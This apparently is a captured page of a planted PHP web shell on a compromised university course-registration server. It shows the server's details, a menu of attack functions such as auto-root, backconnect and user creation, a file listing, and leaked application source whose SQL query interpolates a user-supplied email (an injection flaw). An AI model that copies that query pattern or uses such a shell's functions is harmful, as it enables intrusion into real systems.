Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
conreg /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
bower_components
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
documents
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
mailer
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
uploadDoc
[ DIR ]
drwxr-xr-x
validation
[ DIR ]
drwxr-xr-x
404.php
2.86
KB
-rw-r--r--
changePassword.php
4.67
KB
-rw-r--r--
class.user.php
3.69
KB
-rw-r--r--
common-oldbkp.php
5.19
KB
-rw-r--r--
common.php
5.99
KB
-rw-r--r--
config.php
296
B
-rw-r--r--
dashboard.php
7.11
KB
-rw-r--r--
dbconfig.php
1.31
KB
-rw-r--r--
error_log
5.69
KB
-rw-r--r--
forgotPassword.php
5.28
KB
-rw-r--r--
fpass.php
3.11
KB
-rw-r--r--
google_auth.php
2.06
KB
-rw-r--r--
index-login-bkp.php
5.62
KB
-rw-r--r--
index.php
11.97
KB
-rw-r--r--
logout.php
645
B
-rw-r--r--
logoutgmail.php
977
B
-rw-r--r--
page-top.php
5.8
KB
-rw-r--r--
pay-bkp15722.php
8.49
KB
-rw-r--r--
pay-oldbkp.php
5.39
KB
-rw-r--r--
pay.php
5.15
KB
-rw-r--r--
payNow-oldbkp.php
7.07
KB
-rw-r--r--
payNow.php
7.13
KB
-rw-r--r--
payNowLink-bkp15722.php
10.56
KB
-rw-r--r--
payNowLink.php
8.1
KB
-rw-r--r--
paymentlinkcn.php
7.95
KB
-rw-r--r--
paymentlinkcoa.php
8.33
KB
-rw-r--r--
paymentlinkcyber.php
7.95
KB
-rw-r--r--
paymentlinkdm.php
7.95
KB
-rw-r--r--
paymentlinkds.php
7.95
KB
-rw-r--r--
paymentlinkip.php
8.31
KB
-rw-r--r--
paymentlinkml.php
8.28
KB
-rw-r--r--
paymentlinkos.php
8.28
KB
-rw-r--r--
personalInformations-bkp15722....
16.31
KB
-rw-r--r--
personalInformations.php
19.12
KB
-rw-r--r--
register.php
18.78
KB
-rw-r--r--
registrationVerify.php
2.5
KB
-rw-r--r--
resetpass.php
5.27
KB
-rw-r--r--
verify-bkp15722.php
12.67
KB
-rw-r--r--
verify-oldbkp.php
7.15
KB
-rw-r--r--
verify.php
9.26
KB
-rw-r--r--
viewStudentDetails.php
18.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : personalInformations-bkp15722.php
<?php ob_start(); require __DIR__ . DIRECTORY_SEPARATOR . "lib" . DIRECTORY_SEPARATOR . "config.php"; // HTML require PATH_LIB . "page-top.php"; //session_start(); require_once 'common.php'; $studentID = $row[ 'studentID' ]; $personalInformation_fee = new STUDENT(); $emailID = $row[ 'studentEmail' ]; if ( isset( $_POST[ 'btn-submit' ] ) ) { $studentID = $row[ 'studentID' ]; $studentName = $row[ 'studentName' ]; $emailID = trim( $_POST[ 'emailID' ] ); $countryCode = trim( $_POST[ 'countryCode' ] ); $mobileNumber = trim( $_POST[ 'mobileNumber' ] ); $institutionName = trim( $_POST[ 'institutionName' ] ); $department = trim( $_POST[ 'department' ] ); $yourTitle = trim( $_POST[ 'yourTitle' ] ); $institutionType = trim( $_POST[ 'institutionType' ] ); $firstChoice = trim( $_POST[ 'firstChoice' ] ); $howManyTimes = trim( $_POST[ 'howManyTimes' ] ); $secondChoice = trim( $_POST[ 'secondChoice' ] ); $howManyTimes2 = trim( $_POST[ 'howManyTimes2' ] ); $feecover = trim( $_POST[ 'feecover' ] ); $approverEmail = trim( $_POST[ 'approverEmail' ] ); $approverTitle = trim( $_POST[ 'approverTitle' ] ); $approverOtherTitle = trim( $_POST[ 'approverOtherTitle' ] ); $applicationStatus ="PENDING"; $formStatus ="APPLIED"; if ( !isset( $errMSG ) ) { $stmt = $personalInformation_fee->runQuery( "SELECT * FROM personalinformation WHERE studentID=:studentID1 and emailID='$emailID'" ); $stmt->execute( array( ":studentID1" => $studentID ) ); $rows = $stmt->fetch( PDO::FETCH_ASSOC ); if ( $stmt->rowCount() > 0 ) { $errMSG = "You have already submited."; } else { if ( $personalInformation_fee->personalinformation($studentID, $studentName, $emailID, $countryCode, $mobileNumber, $institutionName, $department, $yourTitle, $institutionType, $firstChoice, $howManyTimes, $secondChoice, $howManyTimes2, $feecover, $approverEmail, $approverTitle, $approverOtherTitle,$applicationStatus,$formStatus ) ) { $successMSG = "Your form has been submited successfuly.."; } else { $errMSG = "Sorry , Query could not execute..."; } } } } ?> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> CSEDU MODULE REGISTRATION FORM <!--<small>Control panel</small> --> </h1> <ol class="breadcrumb"> <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li> <li class="active">User Dashboard</li> </ol> </section> <!-- Main content --> <section class="content"> <?php $stmt1 = $personalInformation_fee->runQuery( "SELECT * FROM personalinformation WHERE studentID=:studentID1 and emailID='$emailID'" ); $stmt1->execute( array( ":studentID1" => $studentID ) ); $row1 = $stmt1->fetch( PDO::FETCH_ASSOC ); echo $studentIDs1 = $row1['studentID']; if ( $row1[ 'formStatus' ] == 'APPLIED' ) { ?> <div class="alert alert-success alert-dismissible"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> <h4><center><i class="icon fa fa-check"></i> Your registration details have been submitted succesfully. Click on the dashboard to view the details and do the fee payment if not done yet. <br/><br/> <?php if($row1['firstChoice']=='Intro to Programming (Python)') { ?> <a href="https://csedu.iiitd.ac.in/ApplicationForm/payNowLink.php?authToken=<?php echo $tokenAuth;?>">Click Here for Fee Payment</a> </center></h4> <?php } elseif($row1['firstChoice']=='Machine Learning'){?> <a href="https://csedu.iiitd.ac.in/ApplicationForm/payNowLink.php?authToken=<?php echo $tokenAuth;?>" >Click Here for Fee Payment</a> </center></h4> <?php } elseif($row1['firstChoice']=='Operating Systems'){?> <a href="https://csedu.iiitd.ac.in/ApplicationForm/payNowLink.php?authToken=<?php echo $tokenAuth;?>&&StID=<?php echo $studentIDs1; ?>">Click Here for Fee Payment</a> </center></h4> <?php } elseif($row1['firstChoice']=='Computer Organization and Architecture'){?> <a href="https://csedu.iiitd.ac.in/ApplicationForm/payNowLink.php?authToken=<?php echo $tokenAuth;?>">Click Here for Fee Payment</a> </center></h4> <?php }?> </div> <!--<p>Please do the payment from this link. <a href="https://csedu.iiitd.ac.in/ApplicationForm/paymentlinkip.php" target="_blank">Click Here</a></p> --> <?php } else { ?> <form id="signupForm" name="signupForm" action="personalInformations.php?authToken=<?php echo $tokenAuth;?>" method="post" onSubmit="if(!confirm('please check the details before submit and click on ok if all is fine.')){return false;} return validateForm()"> <!-- SELECT2 EXAMPLE --> <div class="box box-default"> <div class="box-body"> <?php if ( isset( $errMSG ) ) { ?> <div class="alert alert-danger alert-dismissible"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> <h4><i class="icon fa fa-ban"></i> Alert! <?php echo $errMSG; ?></h4> </div> <?php } else if ( isset( $successMSG ) ) { ?> <div class="alert alert-success alert-dismissible"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> <h4><i class="icon fa fa-check"></i> Alert! <?php echo $successMSG; ?></h4> </div> <?php } ?> </div> <!-- /.box-header --> <div class="box-body"> <div class="row form-row"> <div class="col-md-3 form-pd"> <label><strong>First Choice:</strong> Module you want to enroll in (only one allowed) *</label> </div> <div class="col-md-6"> <input type="hidden" name="studentName" id="studentName" class="form-control" value="<?php echo $row['studentName']; ?>" readonly> <input type="hidden" name="emailID" id="emailID" class="form-control" readonly value="<?php echo $row['studentEmail']; ?>"> <input type="hidden" name="countryCode" id="countryCode" class="form-control" value="91" readonly> <input type="hidden" name="countryCode" id="countryCode" class="form-control" value="91" readonly> <input type="hidden" name="mobileNumber" id="mobileNumber" class="form-control" value="<?php echo $row['studentMobile']; ?>" readonly> <input type="hidden" name="institutionName" id="institutionName" class="form-control" value="<?php echo $row['institutionName']; ?>" readonly> <input type="hidden" name="department" id="department" class="form-control" value="<?php echo $row['department']; ?>" readonly> <input type="hidden" name="yourTitle" id="yourTitle" class="form-control" value="<?php echo $row['yourTitle']; ?>" readonly> <input type="hidden" name="institutionType" id="institutionType" class="form-control" value="<?php echo $row['institutionType']; ?>" readonly> <select name="firstChoice" id="firstChoice" class="form-control select2" required> <!--<option value="" checked>--Select--</option> <option value="Intro to Programming (Python)">Intro to Programming (Python)</option> <option value="Cyber Security">Cyber Security</option> <option value="Computer Organization and Architecture">Computer Organization and Architecture</option> <option value="Discrete Maths">Discrete Maths</option> <option value="Operating Systems">Operating Systems</option> --> <option value="" checked>--Select--</option> <option value="Intro to Programming (Python)">Intro to Programming (Python)</option> <option value="Computer Organization and Architecture">Computer Organization and Architecture</option> <option value="Machine Learning">Machine Learning</option> <option value="Operating Systems">Operating Systems</option> </select> </div> </div> <!-- first Box --> <div class="row form-row"> <div class="col-md-3 form-pd"> <label>How many times you have taught this module *</label> </div> <div class="col-md-6"> <!--<input type="text" name="howManyTimes" id="howManyTimes" class="form-control" placeholder="How many times you have taught this course"> --> <select name="howManyTimes" id="howManyTimes" class="form-control select2" required> <option value="" checked>--Select--</option> <option value="1">1</option> <option value="2">2</option> <option value="3">3</option> <option value="4+">4+</option> </select> </div> </div> <div class="row form-row"> <div class="col-md-3 form-pd"> <label><strong>Second Choice:</strong> Module you want to enroll in (only one allowed) *</label> </div> <div class="col-md-6"> <select name="secondChoice" id="secondChoice" class="form-control select2" required> <!--<option value="" checked>--Select--</option> <option value="Cyber Security">Cyber Security</option> <option value="Computer Organization and Architecture">Computer Organization and Architecture</option> <option value="Discrete Maths">Discrete Maths</option> <option value="Operating Systems">Operating Systems</option> --> <option value="" checked>--Select--</option> <option value="Intro to Programming (Python)">Intro to Programming (Python)</option> <option value="Computer Organization and Architecture">Computer Organization and Architecture</option> <option value="Machine Learning">Machine Learning</option> <option value="Operating Systems">Operating Systems</option> </select> </div> </div> <!-- first Box --> <div class="row form-row"> <div class="col-md-3 form-pd"> <label>How many times you have taught this module *</label> </div> <div class="col-md-6"> <!--<input type="text" name="howManyTimes2" id="howManyTimes2" class="form-control" placeholder="How many times you have taught this course"> --> <select name="howManyTimes2" id="howManyTimes2" class="form-control select2" required> <option value="" checked>--Select--</option> <option value="1">1</option> <option value="2">2</option> <option value="3">3</option> <option value="4+">4+</option> </select> </div> </div> <div class="row form-row"> <div class="col-md-3 form-pd"> <label>Who will cover module fees *</label> </div> <div class="col-md-6"> <!--<input type="text" name="howManyTimes2" id="howManyTimes2" class="form-control" placeholder="How many times you have taught this course"> --> <input type="radio" name='feecover' value='Myself' required/> Myself <input type="radio" name='feecover' value='My College/Institute' /> My College/Institute <input type="radio" name='feecover' value='Other (Company etc)' /> Other (Company etc) </div> </div> </div> <div class="box-header with-border"> <h3 class="box-title"><strong>Approver Details</strong></h3> </div> <div class="box-body"> <div class="row"> <div class="col-md-3 "></div> <!-- first Box --> <div class="col-md-6"> <!--<p>Email and title of the approver from your institution. (Please take approval from your Head/Dean/Director and ensure that the approver knows that you are expected to put in about 5 hrs per week on the module.) </p> --> <p> Email and title of the approver from your institution. (Please take approval from your Head/Dean/Director <!--and ensure that the approver knows that you are expected to put in about 5 hrs per week on the module -->. If you are a part-time teacher, you can just enter "none" in the email and select options as "None (as am part-time)" from the title dropdown.)</p> </div> </div> <div class="row"> <div class="col-md-3 form-pd"> <label>Email *</label> </div> <div class="col-md-6"> <input type="text" name="approverEmail" id="approverEmail" class="form-control" placeholder="Approver Email" required> </div> <!-- first Box --> </div> <div class="row form-row"> <div class="col-md-3 form-pd"> <label>Title *</label> </div> <div class="col-md-6"> <select name="approverTitle" id="approverTitle" class="form-control select2" required> <option value="" checked>--Select--</option> <option value="Head">Head</option> <option value="Dean">Dean</option> <option value="Director/VC">Director/VC</option> <option value="other">Other (pls specify)</option> <option value="None (as am part-time)">None (as am part-time)</option> </select> </div> </div> <!-- first Box --> <!-- first Box --> <div class="row form-row"> <div class="col-md-3 form-pd"> <label>Other Title</label> </div> <div class="col-md-6"> <input type="text" name="approverOtherTitle" id="approverOtherTitle" class="form-control"> <br/><p><input type="checkbox" required /> <em> I commit to put in the necessary effort <!--(appx 5 hrs per week) --> for the CSEDU module. <!--I have read the terms & agreements. --></em></p> </div> </div> <!-- first Box --> <div class="row form-row"> <div class="col-md-3 form-pd"> </div> <div class="col-md-9"> <!--<p align="justify"><strong>» If you are a part-time teacher, you can just enter "none" in the email and select options as "None (as am part-time)" from the title dropdown. </strong></p> --> <p align="justify">» <strong>Enrollment</strong>: There is a limit of 100 seats for each module.</p> <!--<p align="justify">» Enrollment will be done largely on a first-come-first-serve basis for all whose registration is approved. Those who could not be accommodated in this offering, will be given preference in next offerings.</p> --> <p align="justify">» Enrollment will be done largely on a first-come-first-serve basis for all whose registration is approved. Those who could not be accommodated in this offering, will be given preference in next offerings.</p> <p align="justify">» Attempts will be made to assign your first choice, though if its registration is full, you may be offered your second choice.</p> <!--<p align="justify">» <strong>Payment</strong>: You will be sent a link for online payment of fees (Rs 10,000 + GST of 18%) once your registration is approved. Payment has to be made within 2 days of receiving the link.</p> --> <p align="justify">» <strong>Payment</strong>: After submission of this form, You will be redirected to the paymemt page for online payment of fees (Rs 5,000 + GST of 18%). Please do the payment from there at the earliest to complete the process.</p> </div> </div> <!-- first Box --> <!-- first Box --> </div> <!-- /.box-body --> <div class="box-footer"> <button type="submit" class="btn btn-default">Cancel</button> <button type="submit" name="btn-submit" class="btn btn-info">Submit</button> </div> </div> </form> <?php }?> </section> <!-- /.content --> </div> <!-- /.content-wrapper --> <?php ob_end_flush(); require PATH_LIB . "page-bottom.php"; ?>
Close